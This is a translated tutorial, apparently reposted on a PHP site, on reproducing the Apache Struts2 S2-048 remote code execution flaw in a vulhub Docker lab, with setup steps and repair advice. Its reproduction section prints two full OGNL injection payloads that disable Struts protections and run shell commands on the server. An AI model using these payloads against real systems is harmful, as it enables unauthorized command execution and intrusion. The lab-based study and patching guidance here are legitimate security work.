How to reproduce the Apache Struts2--048 remote code execution vulnerability

0x0#0Introduction

The Struts2 framework is an open source web application architecture for developing Java EE web applications . It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.

0x01 Vulnerability Overview

The Apache Struts2 2.3.x series has the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory exists. The cause of the vulnerability is when ActionMessage receives the client When controlling parameter data, improper processing after subsequent data splicing and transmission leads to arbitrary code execution

0x02 Impact scope

Struts2 is enabled in the Apache Struts 2.3.x series -struts1-plugin plug-in version.

0x03 environment construction

1. It is more complicated to build Apache Struts2 by yourself. This vulnerability environment is built using the docker environment in vulhub.

Download address: https://github.com/vulhub/vulhub

2. After downloading, unzip and enter the s2-048 directory, and start the vulnerability environment

cd cd vulhub -master/struts2/s2-048/ //Enter the directory

##docker-compose up -d //Start the shooting range

3. Use docker ps to check whether the startup is successful

4. Enter http:your-ip:8080/hello.action in the browser and see the following page environment Construction completed

0x04 vulnerability recurrence

1. Enter the following link in the browser to access the vulnerability page

http://192.168.3.160:8080/integration/saveGangster.action

2. Enter ${1+1} in the first form "Gangster Name", Enter whatever you want below, click submit to view the executed OGNL expression

##2. Put ${1+1 at "Gangster Name" }Modify the payload statement executed by the following command

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}

3. You can also Use Burp to capture the packet and modify it into the statement of the payload executed by the command

Note: The payload needs to be URL encoded

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

4. It can be implemented using automated scripts or graphical tools, and is not demonstrated here.

Tools can be searched and downloaded on GitHub

0x05 repair suggestions

1. Upgrade It is recommended to upgrade to the latest version

2. According to business conditions, disable and close (delete) \struts-2.3.x\apps\struts2-showcase.war package

The above is the detailed content of How to reproduce the Apache Struts2--048 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!